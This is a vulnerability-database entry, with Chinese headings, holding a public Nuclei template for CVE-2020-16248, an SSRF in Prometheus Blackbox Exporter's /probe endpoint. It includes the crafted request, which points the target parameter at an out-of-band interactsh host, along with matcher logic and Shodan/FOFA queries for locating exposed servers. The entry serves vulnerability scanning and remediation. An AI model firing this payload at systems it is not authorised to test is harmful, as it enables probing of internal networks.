漏洞描述
Prometheus Blackbox Exporter through 0.17.0 contains a server-side request forgery caused by unsanitized target parameter in /probe, letting attackers perform SSRF attacks, exploit requires sending crafted target parameter.
CVE-2020-16248: Prometheus Blackbox Exporter - Server-Side Request Forgery (SSRF)
PoC代码[已公开]
id: CVE-2020-16248
info:
name: Prometheus Blackbox Exporter - Server-Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: medium
description: |
Prometheus Blackbox Exporter through 0.17.0 contains a server-side request forgery caused by unsanitized target parameter in /probe, letting attackers perform SSRF attacks, exploit requires sending crafted target parameter.
impact: |
Attackers can perform SSRF attacks, potentially accessing internal services or causing denial of service.
remediation: |
Update to version 0.17.1 or later to fix the vulnerability.
reference:
- https://github.com/prometheus/blackbox_exporter/issues/669
- https://nvd.nist.gov/vuln/detail/CVE-2020-16248
- https://prometheus.io/docs/operating/security/#exporters
- https://www.openwall.com/lists/oss-security/2020/08/08/3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2020-16248
epss-score: 0.03527
epss-percentile: 0.87323
cwe-id: CWE-918
metadata:
max-request: 1
shodan-query: title:"Blackbox Exporter"
fofa-query: title="Blackbox Exporter"
verified: true
vendor: prometheus
product: blackbox_exporter
tags: cve,cve2020,ssrf,prometheus,blackbox-exporter,oast,oob
http:
- method: GET
path:
- "{{BaseURL}}/probe?target={{interactsh-url}}&module=http_2xx"
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol,'dns')"
- 'contains(body, "probe_dns_lookup_time_seconds")'
condition: and
# digest: 4b0a004830460221008edb39cb8019052130f67e448ade3f8ce4f7180c5f3af034b85c08a5bb8bb593022100e731f124738da135d26133fab86b5534bcf7b8af73949ef399b9721f9858d7bb:922c64590222798bb761d5b6d8e72950